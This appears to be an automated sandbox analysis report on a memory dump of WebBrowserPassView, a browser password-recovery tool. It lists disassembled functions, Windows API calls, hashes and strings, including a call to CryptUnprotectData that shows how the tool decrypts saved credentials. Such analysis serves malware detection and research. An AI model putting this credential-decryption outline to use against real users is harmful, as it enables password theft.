
Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 600d0468050d6c0c974190016e207e925c0ab4fd49a9922a22aac3e50904c676
Instruction ID: ca87bd2022555555e1e71ab19cfd3b78776a4971098d47f20d95beb5d2123f01
Opcode Fuzzy Hash: 600d0468050d6c0c974190016e207e925c0ab4fd49a9922a22aac3e50904c676
Instruction Fuzzy Hash: CCC04C355503008FF7168F22ED4E76A32B4B700357F414D74D40085062EB78C514CA1C

Uniqueness

Uniqueness Score: -1.00%

Function 0040B4E4 Relevance: 1.5, APIs: 1, Instructions: 8COMMON

Download Yara Rule

APIs

FindClose.KERNELBASE(?,0040B447,?,00000000,004149BF,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040B4EE

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: CloseFind
String ID:
API String ID: 1863332320-0
Opcode ID: 7b6ab146b4268e51a5c44590b0b181f0b71ff05a35f264cb6b2d58c8236388a4
Instruction ID: 4ebaaad3abebb35ea561999068b04e119c5bd0073050e994cd3dd7ff13ec2e23
Opcode Fuzzy Hash: 7b6ab146b4268e51a5c44590b0b181f0b71ff05a35f264cb6b2d58c8236388a4
Instruction Fuzzy Hash: E6C048341109028AE2285B38985942A76A0AA4A3303B40F6CA0F6920F0EB3899868A08

Uniqueness

Uniqueness Score: -1.00%

Function 0040A157 Relevance: 1.5, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,0040DF98,?,0040E04F,00000000,?,00000000,00000208,?), ref: 0040A15B

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 45ec320b698d0105a77b428ef27c265de4d5060260cc72b868003af4cb6e54e0
Instruction ID: 81611b1af33cf8bffabafaac40f523e309f93145d8b60d33e97b966a2711c68d
Opcode Fuzzy Hash: 45ec320b698d0105a77b428ef27c265de4d5060260cc72b868003af4cb6e54e0
Instruction Fuzzy Hash: 93B012792104009BCB080734DE4504E35505F49631760073CB033C00F0DB20CC64BA00

Uniqueness

Uniqueness Score: -1.00%

Function 00416466 Relevance: 1.5, APIs: 1, Instructions: 7registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00416C27,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,004148A8,?,?,00000000), ref: 00416479

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: fdd4ee8420ff38d50ee0fd67c97a440200559db92fa8313b56074c36fcf39447
Instruction ID: 83906f0e37f9444889d0528ca96d09476c9ae61f439c3988bf04068afc79b07d
Opcode Fuzzy Hash: fdd4ee8420ff38d50ee0fd67c97a440200559db92fa8313b56074c36fcf39447
Instruction Fuzzy Hash: 01C09B39544301BFDF114F40FE05F0ABB61ABC4B05F004414B344240B282714414EB17

Uniqueness

Uniqueness Score: -1.00%

Function 0041DDA9 Relevance: 1.3, APIs: 1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d2eaefd0b4e924761a318baa880c6f1d4900ead5ccf9d44654d0fd569ba43051
Instruction ID: 44a613232f5d856dc5ac7483348cac20a1fabfd44cd96dfcc582b64180e5c4d2
Opcode Fuzzy Hash: d2eaefd0b4e924761a318baa880c6f1d4900ead5ccf9d44654d0fd569ba43051
Instruction Fuzzy Hash: 16319CB1A01B05EFDF24AF15D8417DA73A0BB21356F15412BF8149B241D738ADE0CBDA

Uniqueness

Uniqueness Score: -1.00%

Function 004080FB Relevance: 1.3, APIs: 1, Instructions: 59COMMON

Download Yara Rule

APIs

Part of subcall function 0040B5F5: ??2@YAPAXI@Z.MSVCRT ref: 0040B5FE

Part of subcall function 00407AE2: SetFilePointerEx.KERNELBASE(00407AB8,?,?,00000000,00000000,00000000,00408135,00000000,00000000,?,00000000,00407AB8), ref: 00407AFE

memcpy.MSVCRT ref: 0040817E

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: ??2@FilePointermemcpy
String ID:
API String ID: 609303285-0
Opcode ID: ea356a746f5db7ec59e3444e8f7e24b9c927ee0921a75d79612c64919ebe6e17
Instruction ID: 9411481ac6af7364e862306388468c261c6d0645f596cac8d8abf60ea354766a
Opcode Fuzzy Hash: ea356a746f5db7ec59e3444e8f7e24b9c927ee0921a75d79612c64919ebe6e17
Instruction Fuzzy Hash: 6811C132900108BBDB00A765C940F9F77ACAF85318F15807EF98577282CB78AE0787AD

Uniqueness

Uniqueness Score: -1.00%

Function 004083CC Relevance: 1.3, APIs: 1, Instructions: 56COMMON

Download Yara Rule

APIs

_wcsicmp.MSVCRT ref: 004083FD

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: _wcsicmp
String ID:
API String ID: 2081463915-0
Opcode ID: 13af99538766b2a182500595b229227d4534b1020d2eec3942169f622147e130
Instruction ID: 355d7b68675bcf71531e109d1974fa15c2d23b2ab6a250ec1a74cd6812f94247
Opcode Fuzzy Hash: 13af99538766b2a182500595b229227d4534b1020d2eec3942169f622147e130
Instruction Fuzzy Hash: 3F115E71600606AFCB14DF65C9C199EB7F8FF44314B10853EE596E3282EB34F9459B68

Uniqueness

Uniqueness Score: -1.00%

Function 00407A50 Relevance: 1.3, APIs: 1, Instructions: 39COMMON

Download Yara Rule

APIs

Part of subcall function 00407AD0: CloseHandle.KERNEL32(000000FF,00407A60,00000000,00000000,0040BD9A,?,00000000,00000104,00000000,?,?,?,0040C27F,?,0040C401,000000FF), ref: 00407AD8

Part of subcall function 00409C82: CreateFileW.KERNELBASE(00000003,80000000,00000003,00000000,00000003,00000000,00000000,0040D0E2,0040118B,0040118B,?,?,?,?,000003FF), ref: 00409C94

GetLastError.KERNEL32(00000000,00000000,0040BD9A,?,00000000,00000104,00000000,?,?,?,0040C27F,?,0040C401,000000FF,?,00000104), ref: 00407ABD

Part of subcall function 0040A8AE: ReadFile.KERNELBASE(?,?,?,00000000,00000000,?,?,0040D11F,?,?,00000000), ref: 0040A8C5

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: File$CloseCreateErrorHandleLastRead
String ID:
API String ID: 2136311172-0
Opcode ID: b5cb65a831526968e61f3b8b20486ca7c6747027f1051b4f106f0081e9cc041b
Instruction ID: 35cd9f8c1dcfc8a6b291ae52797bf89ab5d951bbdcfd6650bf437470b2e439e1
Opcode Fuzzy Hash: b5cb65a831526968e61f3b8b20486ca7c6747027f1051b4f106f0081e9cc041b
Instruction Fuzzy Hash: 3601D6B1A182019EE3209B30C80579B77D8EF50315F14883FE596E62C1E77CA9808A7F

Uniqueness

Uniqueness Score: -1.00%

Function 0040B5F5 Relevance: 1.3, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

Part of subcall function 0040B671: ??3@YAXPAX@Z.MSVCRT ref: 0040B678

??2@YAPAXI@Z.MSVCRT ref: 0040B5FE

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: ??2@??3@
String ID:
API String ID: 1936579350-0
Opcode ID: 35078aa9528d176a3a2e80a839a21edae065cbdddee7803ec72af34415444393
Instruction ID: 1651319002fec664f26f06c15537a8029accf68742c71f4261269a8637093df6
Opcode Fuzzy Hash: 35078aa9528d176a3a2e80a839a21edae065cbdddee7803ec72af34415444393
Instruction Fuzzy Hash: 1EC02B7281D2104FDB10FF74340145A23D4CE832203014C2FE4C0F3100D6384401039D

Uniqueness

Uniqueness Score: -1.00%

Function 0040B02A Relevance: 1.3, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

free.MSVCRT(00000000,0040B3AF,00000000,?,00000000), ref: 0040B031

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 7e96c0334e5700b3217717c12c936e5c8bc79841484eb53a37ab721f95e95596
Instruction ID: a4aab80efa05a36e40e003174c8289b0fd75b8aa2e0c69bc48311badf276c503
Opcode Fuzzy Hash: 7e96c0334e5700b3217717c12c936e5c8bc79841484eb53a37ab721f95e95596
Instruction Fuzzy Hash: 3BC002B25117018BE7349E15C449766B3E8EF20B6BF61881D94E591481D7BCD4848A18

Uniqueness

Uniqueness Score: -1.00%

Function 00408D81 Relevance: 1.3, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

free.MSVCRT(00000000,004124C5,/deleteregkey,/savelangfile,?,?,?,?,00000002,?,00446AC4,00000000,?,0000000A), ref: 00408D88

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 8bbca39f266a6f000b4c72b8d7a71c68e8e69029b91d150487a399c13b1e3803
Instruction ID: de1c0baefddc23ff079bab1c2c377a9ae2e5f1a26b18513abd574526421c75a5
Opcode Fuzzy Hash: 8bbca39f266a6f000b4c72b8d7a71c68e8e69029b91d150487a399c13b1e3803
Instruction Fuzzy Hash: 39C002B2551B098FE7209E15C505762B3E8AF1073BF958D1D94D5914C1DB7CD4448E15

Uniqueness

Uniqueness Score: -1.00%

Function 0041729B Relevance: 1.3, APIs: 1, Instructions: 5COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 0041729F

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: df981978903576c94245b9e122b1d11dbdca9cb07129e532542aba849d07663a
Instruction ID: 3aa5576ec611755f8cd3c559a3e90b43ca4d179dd92e5c4db0b995cbc1efbf24
Opcode Fuzzy Hash: df981978903576c94245b9e122b1d11dbdca9cb07129e532542aba849d07663a
Instruction Fuzzy Hash: 9C9002C2496519105D0431755C06505120C4852136375075A7032959D1CE1880506129

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 004053E1 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 52libraryloaderwindowCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,004122D2,00000000,?,00000002,?,00446AC4,00000000,?,0000000A), ref: 00405400
GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00405412
FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,004122D2,00000000,?,00000002,?,00446AC4,00000000,?,0000000A), ref: 00405426
#17.COMCTL32(?,00000002,?,?,?,004122D2,00000000,?,00000002,?,00446AC4,00000000,?,0000000A), ref: 00405434
MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00405451

Strings

Error: Cannot load the common control classes., xrefs: 0040544B
comctl32.dll, xrefs: 004053E9
Error, xrefs: 00405446
InitCommonControlsEx, xrefs: 0040540C

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: Library$AddressFreeLoadMessageProc
String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
API String ID: 2780580303-317687271
Opcode ID: 5dfb1fab429fbac110f65632f4351b7de0d7d1b2a154ff3275be3e3fb28183c9
Instruction ID: 02647c2cd5375a0cee16ec096afc735ec0ee25a180069e9de50cf8421b07617d
Opcode Fuzzy Hash: 5dfb1fab429fbac110f65632f4351b7de0d7d1b2a154ff3275be3e3fb28183c9
Instruction Fuzzy Hash: D801F4767516106BE7115BB4AC89BBB3A9CDF4674AB400035F502E6290EBBCDD098A6C

Uniqueness

Uniqueness Score: -1.00%

Function 0041A773 Relevance: 12.1, APIs: 8, Instructions: 70timeCOMMON

Download Yara Rule

APIs

GetSystemTime.KERNEL32(?), ref: 0041A78D
memcpy.MSVCRT ref: 0041A79C
GetCurrentProcessId.KERNEL32 ref: 0041A7AD
memcpy.MSVCRT ref: 0041A7C0
GetTickCount.KERNEL32 ref: 0041A7D4
memcpy.MSVCRT ref: 0041A7E7
QueryPerformanceCounter.KERNEL32(?), ref: 0041A7FD
memcpy.MSVCRT ref: 0041A80D

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
String ID:
API String ID: 4218492932-0
Opcode ID: e75bf55485dc5d7d8b1ce748ae8fe2053cdeb53d697cd784200e391488fbf47e
Instruction ID: 2cc184040992abe9e4e17126ecdb49144539f0c36084feaac1bb63b25c18b641
Opcode Fuzzy Hash: e75bf55485dc5d7d8b1ce748ae8fe2053cdeb53d697cd784200e391488fbf47e
Instruction Fuzzy Hash: 6E11B9F3D0051867DB00EFA4DC49DDAB7ADEF4A210F464936FA15C7141E634E64887E5

Uniqueness

Uniqueness Score: -1.00%

Function 0041A225 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 0041A22E

Part of subcall function 004192F2: GetVersionExW.KERNEL32(?), ref: 00419315

FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 0041A255
FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 0041A27E
LocalFree.KERNEL32(?), ref: 0041A299
free.MSVCRT(?,00455E58,?), ref: 0041A2C7

Part of subcall function 0041938B: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,74CB5970,?,004194B6,?), ref: 004193A9
Part of subcall function 0041938B: malloc.MSVCRT ref: 004193B0

Strings

OsError 0x%x (%u), xrefs: 0041A2AB

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: FormatMessage$ByteCharErrorFreeLastLocalMultiVersionWidefreemalloc
String ID: OsError 0x%x (%u)
API String ID: 2360000266-2664311388
Opcode ID: 66a5431910ad0f0ce767ad32103e4c3a3757044076d62f59ce7878390095469b
Instruction ID: 09a38d3d336ad90078d9ee04c195a6b5e61967dcbffd067f140ccdfba9bcaacc
Opcode Fuzzy Hash: 66a5431910ad0f0ce767ad32103e4c3a3757044076d62f59ce7878390095469b
Instruction Fuzzy Hash: 1211C834901228BFDF11ABA1DC49CEF7F78EF45760B104067F805A2211D7750E95D7A9

Uniqueness

Uniqueness Score: -1.00%

Function 0041138D Relevance: 4.5, APIs: 3, Instructions: 44fileclipboardCOMMON

Download Yara Rule

APIs

Part of subcall function 0040A004: GetTempPathW.KERNEL32(00000104,?,?), ref: 0040A01B
Part of subcall function 0040A004: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 0040A02D
Part of subcall function 0040A004: GetTempFileNameW.KERNELBASE(?,004011DE,00000000,?), ref: 0040A044

OpenClipboard.USER32(?), ref: 004113CB
GetLastError.KERNEL32 ref: 004113E0
DeleteFileW.KERNEL32(?), ref: 004113FF

Part of subcall function 00409EA1: EmptyClipboard.USER32 ref: 00409EAB
Part of subcall function 00409EA1: GetFileSize.KERNEL32(00000000,00000000), ref: 00409EC8
Part of subcall function 00409EA1: GlobalAlloc.KERNEL32(00002000,00000002), ref: 00409ED9
Part of subcall function 00409EA1: GlobalLock.KERNEL32 ref: 00409EE6
Part of subcall function 00409EA1: ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00409EF9
Part of subcall function 00409EA1: GlobalUnlock.KERNEL32(00000000), ref: 00409F0B
Part of subcall function 00409EA1: SetClipboardData.USER32 ref: 00409F14
Part of subcall function 00409EA1: CloseHandle.KERNEL32(?), ref: 00409F28
Part of subcall function 00409EA1: CloseClipboard.USER32 ref: 00409F3C

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: ClipboardFile$Global$CloseTemp$AllocDataDeleteDirectoryEmptyErrorHandleLastLockNameOpenPathReadSizeUnlockWindows
String ID:
API String ID: 2633007058-0
Opcode ID: 20d099faa1af22661b39900e4eb9d3841db7e32abb08b7b598010ec37cab23bc
Instruction ID: 67aa2ef175f2399da1d40db2a93dbf2ce4f101bde76a1b907a1a325d03d0d586
Opcode Fuzzy Hash: 20d099faa1af22661b39900e4eb9d3841db7e32abb08b7b598010ec37cab23bc
Instruction Fuzzy Hash: B3F0F43530030496EB202B72DC4EFDB365DCB80711F00003ABA62961E2EE79EC858568

Uniqueness

Uniqueness Score: -1.00%

Function 004192F2 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32(?), ref: 00419315

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: Version
String ID:
API String ID: 1889659487-0
Opcode ID: 7326f150f62c8e493511fbb22f4dc93557bb1aa2f813e00d2fd5eebd9c0dcf9c
Instruction ID: 31f7a407b4742d582560ea033e5ca5f76b9ceb554be12180941efba1faa7fce5
Opcode Fuzzy Hash: 7326f150f62c8e493511fbb22f4dc93557bb1aa2f813e00d2fd5eebd9c0dcf9c
Instruction Fuzzy Hash: 64E0B67591131CCFEB28DB35DB4B3C67AE4A718B46F4004B5C21AD2192D2789A88CA67

Uniqueness

Uniqueness Score: -1.00%

Function 0040298A Relevance: 110.5, APIs: 9, Strings: 54, Instructions: 285COMMON

Download Yara Rule

APIs

_wcsicmp.MSVCRT ref: 004029B7
_wcsicmp.MSVCRT ref: 004029E8
_wcsicmp.MSVCRT ref: 00402A16
_wcsicmp.MSVCRT ref: 00402A44

Part of subcall function 0040B04F: wcslen.MSVCRT ref: 0040B062
Part of subcall function 0040B04F: memcpy.MSVCRT ref: 0040B081

memset.MSVCRT ref: 00402D70
memcpy.MSVCRT ref: 00402DAC

Part of subcall function 00407687: GetProcAddress.KERNEL32(0045EC00,00000000), ref: 004076B7
Part of subcall function 00407687: FreeLibrary.KERNEL32(00000000,00000141,?,-000000FB,?,004016C4,?,00000000,00000000,?), ref: 004076DA
Part of subcall function 00407687: CryptUnprotectData.CRYPT32(-000000FB,00000000,-000000FB,00000000,00000000,-000000FB,-000000FB), ref: 004076FC

memcpy.MSVCRT ref: 00402E10
LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402E75
